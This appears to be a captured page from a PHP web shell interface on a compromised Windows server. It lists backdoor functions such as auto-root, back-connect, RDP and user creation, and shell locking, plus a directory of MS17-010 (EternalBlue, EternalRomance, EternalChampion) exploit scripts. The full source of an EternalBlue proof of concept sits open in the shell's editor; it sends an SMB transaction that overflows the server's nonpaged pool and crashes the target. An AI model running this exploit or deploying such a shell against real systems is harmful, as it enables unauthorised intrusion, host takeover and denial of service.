Windows NT SRV-DATA 6.3 build 9600 (Windows Server 2012 R2 Standard Edition) AMD64
Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/8.2.0
: 192.168.213.201 | : 216.73.216.72
Cant Read [ /etc/named.conf ]
8.2.0
ADMINISTRATEUR
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
[ C ]
[ E ]
[ Z ]
C: /
Users /
admin /
Desktop /
MS17-010-master /
[ HOME SHELL ]
Name
Size
Permission
Action
shellcode
[ DIR ]
drwxrwxrwx
BUG.txt
27.13
KB
-rw-rw-rw-
Nouveau document texte.txt
0
B
-rw-rw-rw-
README.md
3.29
KB
-rw-rw-rw-
checker.py
2.44
KB
-rw-rw-rw-
eternalblue_exploit7.py
25.12
KB
-rw-rw-rw-
eternalblue_exploit8.py
23.51
KB
-rw-rw-rw-
eternalblue_poc.py
3.71
KB
-rw-rw-rw-
eternalchampion_leak.py
1.51
KB
-rw-rw-rw-
eternalchampion_poc.py
2.53
KB
-rw-rw-rw-
eternalchampion_poc2.py
5.8
KB
-rw-rw-rw-
eternalromance_leak.py
1.61
KB
-rw-rw-rw-
eternalromance_poc.py
948
B
-rw-rw-rw-
eternalromance_poc2.py
4.99
KB
-rw-rw-rw-
eternalsynergy_leak.py
1.82
KB
-rw-rw-rw-
eternalsynergy_poc.py
2.95
KB
-rw-rw-rw-
infoleak_uninit.py
1.08
KB
-rw-rw-rw-
mysmb.py
16.28
KB
-rw-rw-rw-
mysmb.pyc
16.68
KB
-rw-rw-rw-
npp_control.py
1.8
KB
-rw-rw-rw-
pip.py
2.98
KB
-rw-rw-rw-
python
0
B
-rw-rw-rw-
smbold.py
41
KB
-rw-rw-rw-
win7.py
26.09
KB
-rw-rw-rw-
zzz_exploit.py
42.4
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : eternalblue_poc.py
from impacket import smb from mysmb import MYSMB from struct import pack import random import sys ''' PoC: demonstrates how NSA eternalblue triggers the buffer overflow ''' USERNAME = '' PASSWORD = '' if len(sys.argv) != 2: print("{} <ip>".format(sys.argv[0])) sys.exit(1) target = sys.argv[1] conn = MYSMB(target) conn.login(USERNAME, PASSWORD) tid = conn.tree_connect_andx('\\\\'+target+'\\'+'IPC$') conn.set_default_tid(tid) ''' To craft FEALIST for nonpaged pool overflow, we need to know following data structures. typedef struct _FEA { /* fea */ BYTE fEA; /* flags */ BYTE cbName; /* name length not including NULL */ USHORT cbValue; /* value length */ } FEA, *PFEA; typedef struct _FEALIST { /* feal */ DWORD cbList; /* total bytes of structure including full list */ FEA list[1]; /* variable length FEA structures */ } FEALIST, *PFEALIST; typedef struct _FILE_FULL_EA_INFORMATION { ULONG NextEntryOffset; UCHAR Flags; UCHAR EaNameLength; USHORT EaValueLength; CHAR EaName[1]; } FILE_FULL_EA_INFORMATION, *PFILE_FULL_EA_INFORMATION; A server need to convert FEA to FILE_FULL_EA_INFORMATION. FEA is byte aligned while FILE_FULL_EA_INFORMATION is DWORD aligned. For example: - FEA '\x00\x01\x01\x00n\x00v' (flags=0, cbName=1, cbValue=1, Name='n\0', Value='v') - to FILE_FULL_EA_INFORMATION '????\x00\x00\x01\x00n\x00v'+'\x00' (last byte is padding) - FEA '\x00\x00\x00\x00\x00' (flags=0, cbName=0, cbValue=0, Name='\0', Value='') - to FILE_FULL_EA_INFORMATION '????\x00\x00\x00\x00\x00'+'\x00'*3 (last 3 bytes are padding) From last example, smallest FEA size is 5 bytes. When it is converted to FILE_FULL_EA_INFORMATION, a buffer size is 12 bytes. With many small FEA entries, a server need to allocate buffer for FILE_FULL_EA_INFORMATION entries much larger than input. This is helpful to control the size of vulnerable nonpaged pool. A FEA flags value is another important value in exploitation. Only 0 and 0x80 is valid flags. Before converting FEA to FILE_FULL_EA_INFORMATION, the flags is checked first. If the flags is invalid, the converting process is stopped. So we can use the flags value to controll how many bytes we want to overflow. ''' # OOB write ~0xcc00 (OOB read ~0x8c00 too because we do not provide enough data for last FEA) # With this large OOB write and read, page fault should be happen (BSOD) payload = pack('<I', 0x10000) # FEALIST.cbList payload += pack('<BBH', 0, 0, 0xc003) + 'A'*0xc004 # FEA # because of bug in SrvOs2FeaListSizeToNt(), below FEA is converted to FILE_FULL_EA_INFORMATION but a server # does not allocate buffer for it. payload += pack('<BBH', 0, 0, 0xcc00) + 'B'*0x4000 # First transaction request MUST be NT transaction because we need to send a data size >=0x10000 mid = conn.next_mid() # NT function can be any TRANS2_OPEN2 = 0 # need parameter at least 30 bytes conn.send_nt_trans(2, setup=pack('<H', TRANS2_OPEN2), mid=mid, param='\x00'*30, data=payload[:1000], totalDataCount=len(payload)) i = 1000 while i < len(payload): sendSize = min(4096, len(payload) - i) # As mentioned in BUG.txt, we can send any secondary transaction for filling transaction data. # Only last request that complete the transaction data need to be correct (TRANS2 in this case). # We can also send data in any order. method = 1 if len(payload) - i <= 4096 else random.randint(0, 2) if method == 0: conn.send_trans_secondary(mid, data=payload[i:i+sendSize], dataDisplacement=i) elif method == 1: conn.send_trans2_secondary(mid, data=payload[i:i+sendSize], dataDisplacement=i) else: conn.send_nt_trans_secondary(mid, data=payload[i:i+sendSize], dataDisplacement=i) i += sendSize conn.recvSMB() conn.disconnect_tree(tid) conn.logoff() conn.get_socket().close()
Close